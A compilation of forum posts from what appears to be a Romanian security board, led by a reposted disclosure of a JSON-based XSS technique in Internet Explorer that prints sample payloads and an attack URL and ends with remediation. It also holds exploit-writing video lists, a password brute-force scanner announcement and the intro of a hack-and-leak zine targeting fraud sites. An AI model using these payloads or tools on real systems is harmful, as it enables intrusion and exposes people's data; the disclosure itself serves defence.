http://www.youtube.com/watch?v=m2GkLL9d68E

We would like to thank Oracle and Microsoft for their cooperation.

-Roee Hay and Yair Amit

Source: IBM Rational Application Security Insider: DNS poisoning via Port Exhaustion
-
JSON-based XSS exploitation
October 24, 2011

JSON rendering in Internet Explorer

In the world of Web 2.0 and mashup web applications, security researchers come across more and more XSS vulnerabilities that are reflected in non-HTML responses. For example, JSON responses are becoming more and more common, but exploiting XSS vectors in those pages is considered theoretical because browsers pop up the file download dialog instead of rendering the response when the returned content-type is application/json or application/javascript.

There are a few known methods to indirectly exploit these issues:

1. Attacking the JSON parsing mechanism: Some applications use JS evaluation functions (eval) to create an object from the returned JSON content. If the attacker is able to inject, for example, a quote sign, he can break out of the JS string surrounding the value and exploit the XSS through the eval function. For example:

    "name":"Foo "+alert(/XSS/.source)+"Bar"

2. Waiting for document.write: Some applications write parts of the data returned in the JSON response into the DOM. An attacker can inject HTML content into the JSON response that will be rendered once the application writes it to the page. For example:

    "name":"Foo <img src=x onerror=alert(/XSS/.source)>Bar"

Although the previous methods work, they have a few limitations: not all applications have the logical flow needed to exploit them, and some applications use client-side filtering that prevents them from running.

After thorough research on alternative ways to exploit these types of vulnerabilities, we have discovered a way to render JSON responses in IE by direct browsing. The way IE decides what content-type to use for a specific response is as follows (as discovered by black-box research):

- The suggested (server-supplied) content-type is looked up in the Windows registry for a corresponding CLSID, in order to find the handler for that response.
- If the suggested content-type is found, IE considers it the final content-type.
- If it is not found, IE attempts to work out the content-type from the file extension and other vectors.

JSON responses generally use the content-type application/json. The problem is that the default MIME type list of Internet Explorer does not include that MIME type; in fact it does not include any JSON MIME type whatsoever.

Example scenario while browsing to a link which returns JSON content:

1. The user browses to http://attacker.com/json.php
2. Internet Explorer searches the registry (HKCR\MIME\Database\Content Type\) for the returned content-type (application/json). Not found.
3. Internet Explorer searches the registry (HKCU\Software\Classes\) for the file extension (.php). Not found.
4. Internet Explorer prompts the file download dialog.

From this scenario we can conclude that when the server returns a content-type unknown to Internet Explorer, the file extension (in addition to other factors not covered here) dictates the final content-type that will be used. To force IE to render JSON responses, the file extension in the URL must be set to something that IE considers text/html (.htm or .html).

The way most web servers parse the path from a request is this:

1. The user requests the page http://site.com/html/pages/page.php?id=1
2. The server starts searching for the requested resource at the pre-defined document root of the web server (for example /var/www/).
3. The server walks the path requested by the user one component at a time (starting from the left).
4. The server finds that /html/pages/page.php is an executable file and stops the search (executable means that the server has some handler that correlates to that file type; in this case the PHP engine).
5. The query string (id=1) is then passed as a GET parameter to PHP.
Most server side languages (.Net, PHP, Python, Perl…) accept another type of parameter to be passed from the URL: Path-Info. Unlike the GET parameter, in which the delimiter value is the question mark sign (?), path-info uses the slash sign (/) as its delimiter. For example the previous path for page.php can be expanded into having a path-info: http://site.com/html/pages/page.php/user=2?id=1 [scheme]://[domain][path]/[path-info]?[get-query] Once an attacker combines path-info with IE's way of considering content-type values, a wide method of exploiting JSON responses for XSS is achievable. Consider the following scenario: The attacker found a reflected XSS in a web application. When browsing to "http://site.com/page.php?user=bla<img onerror=alert(1) src=x>bla" Internet Explorer pops up the file download dialog (explained in the beginning of this document). The attacker now adds the value ".html" as a path-info to the URL The attacker now browses to: http://site.com/page.php/.html?user=blah<img onerror=alert(1) src=x>blah The server returns the same page (containing XSS) with same content-type (application/json) Internet Explorer searches the windows registry for the application/json content-type and cannot find it. This is the point where Internet Explorer uses the file extension of the URL to determine the content-type of the response, only this time the extension IE sees is .html! Internet Explorer finds the matching content-type for .html files to be text/html, renders the response and fires up the XSS. 
Impact: Client side, tested successfully on: • Internet Explorer 6 • Internet Explorer 7 • Internet Explorer 8 • Internet Explorer 9 Server side, tested successfully on: • IIS 5.1 (ASPX , PHP) • IIS 6 (ASPX , PHP) • IIS 7.5 (ASPX , PHP) • Apache/2.2.14 (PHP) Remediation: Client side: • The following registry key will add the content-type application/json and a corresponding CLSID [HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/json] "CLSID"="{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}" Server side: • In order to remediate this issue in the server side, beyond the normally recommended sanitization of user supplied inputs, we recommend turning off support of Path-Info. Sursa: http://blog.watchfire.com/wfblog/2011/10/json-based-xss-exploitation.html
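As an added defensive example (not code from the Watchfire post), a small Python WSGI endpoint that applies the server-side remediation described above: it refuses any request whose path carries extra path-info beyond the script name, escapes HTML-significant characters inside the JSON body, and sends an explicit JSON content-type. The script path /page.php is an assumption, and the X-Content-Type-Options: nosniff header is a hardening step beyond what the post recommends.

```python
import json
from urllib.parse import parse_qs

# The only path this endpoint is meant to answer on (assumed name).
SCRIPT_PATH = "/page.php"


def safe_json_dumps(obj):
    """Serialize to JSON, then escape characters that are harmless in JSON
    but would turn into HTML markup if a browser ever rendered the body."""
    text = json.dumps(obj)
    return (text.replace("<", "\\u003c")
                .replace(">", "\\u003e")
                .replace("&", "\\u0026"))


def json_app(environ, start_response):
    """WSGI app: reject path-info, emit escaped JSON with strict headers."""
    # In WSGI, PATH_INFO is the whole request path below the mount point.
    # Anything after the script name itself (e.g. /page.php/.html) is the
    # path-info the post describes, so require an exact match.
    path = environ.get("PATH_INFO", "")
    if path != SCRIPT_PATH:
        start_response("404 Not Found", [("Content-Type", "text/plain")])
        return [b"not found"]

    query = parse_qs(environ.get("QUERY_STRING", ""))
    user = query.get("user", [""])[0]   # reflected value, escaped below
    body = safe_json_dumps({"name": user}).encode("utf-8")
    headers = [
        ("Content-Type", "application/json; charset=utf-8"),
        ("X-Content-Type-Options", "nosniff"),   # forbid MIME sniffing
        ("Content-Length", str(len(body))),
    ]
    start_response("200 OK", headers)
    return [body]


def call(app, path, query):
    """Drive a WSGI app with a constructed environ (no real server needed).
    Returns (status, headers dict, body text)."""
    captured = {}

    def start_response(status, headers):
        captured["status"] = status
        captured["headers"] = headers

    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path,
               "QUERY_STRING": query}
    body = b"".join(app(environ, start_response))
    return captured["status"], dict(captured["headers"]), body.decode("utf-8")


if __name__ == "__main__":
    print(call(json_app, "/page.php", "user=%3Cb%3Ehi%3C/b%3E"))
    print(call(json_app, "/page.php/.html", "user=x"))
```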
-
From the servers they gained access to. They usually have a reason for every action, and they usually obtain full access: root.
-
ASLR Added to Android 4.0
by Dennis Fisher
October 24, 2011, 8:36AM

The newest version of the Android mobile operating system includes a major security upgrade, the presence of address space layout randomization (ASLR), which gives users some better protection against memory-corruption exploits.

The inclusion of ASLR in Android 4.0, also known as "Ice Cream Sandwich", brings the security model of the operating system up a notch in relation to previous versions. Security researchers have criticized Android for its security shortcomings and have said that the security model offered by Apple's iOS is more beneficial for users. The iPhone operating system has included ASLR and data execution protection (DEP) for some time now, and iOS also includes a sandbox to help prevent attackers from moving among various applications once they've compromised a device.

ASLR is designed to help prevent certain kinds of attacks by making it more difficult for attackers to know which components will be in which memory locations. The technology randomly arranges the positions of various components of a process, which makes it harder for attacks such as buffer overflows and other memory-corruption techniques to succeed. Both ASLR and DEP have been key technologies in desktop operating systems such as Windows Vista and Windows 7 to help prevent common attack techniques.

In addition to the inclusion of ASLR, Android 4.0 also has improved management of user credentials.

"Android 4.0 makes it easier for applications to manage authentication and secure sessions. A new keychain API and underlying encrypted storage let applications store and retrieve private keys and their corresponding certificate chains. Any application can use the keychain API to install and store user certificates and CAs securely," the Android 4.0 developer notes say.

The new mobile OS also includes an enhanced API for VPNs.

"Developers can now build or extend their own VPN solutions on the platform using a new VPN API and underlying secure credential storage. With user permission, applications can configure addresses and routing rules, process outgoing and incoming packets, and establish secure tunnels to a remote server. Enterprises can also take advantage of a standard VPN client built into the platform that provides access to L2TP and IPSec protocols," the notes say.

Sursa: ASLR Added to Android 4.0 | threatpost
-
Yes, I am a communist when it comes to this kind of crap. I haven't commented on any technical topics, I haven't closed any, I haven't handed out a single ban there. I hand out bans here, to people like you, who have no business being here, who hope to sell betting tickets rather than work in IT.
-
I'm fed up with discussions about betting, Serban Huidu, the census or other rubbish. RST is not the right place for that, not even in Offtopic. Of course, looking at your posts, you have only one "interesting" post in Romanian Tutorials: a shitty tutorial (I'm still shocked that you ran a virus scan on an html file ))) ), one in Presentations, and the rest are here, in Offtopic. Basically, according to Nytro's laws, you are surplus here (for now). PS: This kind of discussion will be limited. If you don't like it, there's OTV.
-
Assembly Language Megaprimer for Linux

Description: In this video series, we will learn the basics of Assembly Language programming on Linux. This will help us in doing reverse engineering and writing exploits in later videos. I will start from absolute scratch, so no prerequisites are required.

- Assembly Primer For Hackers (Part 1) System Organization
- Assembly Primer For Hackers (Part 2) Virtual Memory Organization
- Assembly Primer For Hackers (Part 3) Gdb Usage Primer
- Assembly Primer For Hackers (Part 4) Hello World
- Assembly Primer For Hackers (Part 5) Data Types
- Assembly Primer For Hackers (Part 6) Moving Data
- Assembly Primer For Hackers (Part 7) Working With Strings
- Assembly Primer For Hackers (Part 8) Unconditional Branching
- Assembly Primer For Hackers (Part 9) Conditional Branching
- Assembly Primer For Hackers (Part 10) Functions
- Assembly Primer For Hackers (Part 11) Functions Stack

Videos: http://www.securitytube.net/groups?operation=view&groupId=5
-
Windows Assembly Language Megaprimer

Description: In this video series, we will learn how to write assembly code for Windows. We will be using the knowledge we gained in the Assembly Language Megaprimer for Linux.

- Windows Assembly Language Primer Part 1 (Processor Modes)
- Windows Assembly Language Primer For Hackers Part 2 (Protected Mode Assembly)
- Windows Assembly Language Primer For Hackers Part 3 (Win32 Asm Using Masm32)
- Windows Assembly Language Primer For Hackers Part 4 (Masm Data Types)
- Windows Assembly Language Primer For Hackers Part 5 (Procedures)
- Windows Assembly Language Primer For Hackers Part 6 (Macros)
- Windows Assembly Language Primer For Hackers Part 7 (Program Control Using Jmp)
- Windows Assembly Language Primer For Hackers Part 8 (Decision Directives)
- Windows Assembly Language Primer For Hackers Part 9 (Loops)

Videos: http://www.securitytube.net/groups?operation=view&groupId=6
-
Exploit Research Megaprimer

Description: In this video series, we will learn how to program exploits for various vulnerabilities published online. We will also look at how to use various tools and techniques to find zero-day vulnerabilities in both open and closed source software.

- Exploit Research Megaprimer Part 1 Topic Introduction By Vivek
- Exploit Research Megaprimer Part 2 Memcpy Buffer Overflow
- Exploit Research Megaprimer Part 3 Strcpy Buffer Overflow
- Exploit Research Megaprimer Part 4 Minishare Buffer Overflow
- Exploit Research Megaprimer Part 5 Freesshd Buffer Overflow
- Exploit Research Megaprimer Part 6 Seh Basics
- Exploit Research Megaprimer Part 7 Overwrite Seh
- Exploit Research Megaprimer Part 8 Exploiting Seh
- Exploit Research Megaprimer Part 9 Guest Lecture By Andrew King - Binary Diffing Microsoft Patches

Videos: http://www.securitytube.net/groups?operation=view&groupId=7
-
We're closing the topic; this place is meant for people passionate about IT security, so discuss betting somewhere else. Edit: if you wrote software for that, it's a different matter.
-
Secure Your Wordpress | Tool Explained Wpscan

Description: WordPress is one of the most popular CMSes among all its open source competitors. WordPress has a very simple and open framework, which makes it the most desirable choice for anyone who wants to start learning hacking. Today we will look at a tool called wpscan. This tool is a vulnerability scanner for any WordPress installation. It will tell you the following things:

1. Version of the WordPress installation
2. Known list of information disclosure files (e.g. readme.html)
3. WordPress usernames
4. WordPress plugin names
5. Bruteforce for passwords (a password list needs to be generated)

Video: http://www.securitytube.net/video/2367
-
Look at how the link looks, it needs a few small changes... E.g.: Download Security_and_Hacking_Anti_Hacker_Tool_Kit_Second_Edition.chm for free on Filesonic.com
-
xSQLScanner 1.2 and Mono Version

From: Rodrigo Matuck <rodrigomatuck () globo com>
Date: Sun, 23 Oct 2011 21:47:25 -0200

Hi everyone,

I published at my blog a new tool called xSQLScanner. This program allows the user to audit MS-SQL and My-SQL servers.

Some features:
1 - 6 vulnerability audit options;
1.2 - Test for weak passwords fast;
1.3 - Test for wear/user passwords;
1.4 - Wordlist option;
1.5 - Userlist option;
2 - Portscanner
7 - Range IP address audit
and more.

Now the good news: I made 2 versions, Windows & Linux. The Linux version uses the Mono Project, so I compiled a Mono version to run under Linux (BackTrack 5 - GNOME).

Here are the instructions to install under Linux:
1 - get xsqlscan-mono.tgz - 4shared.com - online file sharing and storage - download
2 - tar -xzvf xsqlscan.tar.gz
3 - cd xsqlscan
4 - ./xsqlscanw
5 - The program will verify if you have the Mono core files. If you already have them, the application will launch.
5.1 - Answer 'yes' to download the libs and Mono core files
6 - Restart the application by typing: ./xsqlscanw
7 - Enjoy.

The link for the Windows version: xsqlscanner-1.2.zip - 4shared.com - online file sharing and storage - download

Remember: any bugs, suggestions, please contact me.

Regards

Sursa: Penetration Testing: xSQLScanner 1.2 and Mono Version
-
Owned and exposed - Nr. 3

[ASCII-art banner: "owned and exposed", ISSUE NO 3, "Featuring... Brought to you by your Happy Ninjas"; the layout did not survive extraction]

Contents:
- Intro
- The Happy Ninja Faker
- St0re.cc
- Swissfaking.net
- El-Basar.biz
- Vpn24.org
- Undercover.su
- Secure-Host.in
- k!LLu's Botnet
- Unique-Crew.net
- Zion-Network.net
- Some leftovers
- Hackbase.cc
- Outro

First of all, here is the verification of the sha1 hash we published when hba-crew got owned:
49bd4433fff1b04530dcaff1f52fa971ff895871 = sha1(HAPPY_NINJAS_ARE_STAYING_HAPPY_exp03)

=========={ Intro }=========

Tonight's the night. And it's going to happen, again and again. It has to happen.

We all want to welcome you to a brand new issue of Owned and exp0sed! Before we get to the fun part, we'd just like to clarify some things since there has been a lot going on on the internet since our last issue. Movements, as they put it, like Anonymous or the short-lived phenomenon of Lulzsec have become an increasingly important topic to the media and the public. We want to outline our motivation in contrast to theirs.

Anonymous has tried to gain as much media attention as possible by inflicting the most damage possible on big companies and service providers. Similarly, Lulzsec have attacked various websites and published an enormous amount of information. However, while it's their goal to put pressure on governments and big organizations, it's ours to protect the public from the abysses of the internet. Fraud is our main concern and we intend to contain it as much as possible.

While Anon and Lulzsec toss out their stuff within weeks, we take our time to gain access, collect data and aggregate it nicely for you, our readers. This is why there is a substantial time span between our releases. We of course also monitor the German and international fraud scene as it recovers from our attacks; it's hard to stop something that is driven by selfishness, greed and money.
We also find it worrying that Anonymous and especially Lulzsec act in what they call "Operation Antisec". The original Antisec Movement was brought to life by actual hackers and targeted full disclosure and the corporate security industry. Publishing gigantic amounts of (corporate) data on the internet does exactly the opposite: it provides the security industry with the attention they need and hence new customers.

But let's now look at why we are here today. "Money is the root of all evil", as the proverb has it; and it's why fraud communities do come back after we have owned and exposed them; but as long as they carry on, we do, too. Fraudsters ought to know that they're not safe, because we are going to hunt down every single site that is left. We experience the fraud scene scattering wider and wider after every issue we have published; new boards, and with them new admins, emerge out of nowhere. That just shows again how stubborn fraudsters are, as most of them still refuse to accept that they lost their right to exist on the internet. It's particularly frustrating that they don't seem to draw lessons from getting owned again and again.

That being said, we can just strongly advise you to spend your time on something worthwhile. It's not too late ...

Download: http://blog.yakuza112.org/wp-content/uploads/2011/10/exp03.txt